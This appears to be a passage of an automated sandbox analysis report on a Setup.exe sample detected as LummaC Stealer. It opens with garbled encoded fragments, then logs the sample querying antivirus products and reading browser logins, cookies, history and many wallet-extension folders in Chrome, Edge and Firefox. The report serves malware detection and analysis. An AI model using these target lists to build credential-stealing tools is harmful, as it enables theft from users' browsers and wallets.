babsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwabaauaeqabwb3ag4ababvageazabeageadabhacgajabsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwabaapaaoacgagacaaiaagacqababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0acgagacaaiaagacqababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwalgbxahiaaqb0aguakaakagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwabaasacaamaasacaajabsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwababsagwabJump to behavior
      Source: Attachment.com, 0000000A.00000000.1699124486.0000000000606000.00000002.00000001.01000000.00000007.sdmp, Surrounded.0.dr, Attachment.com.1.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
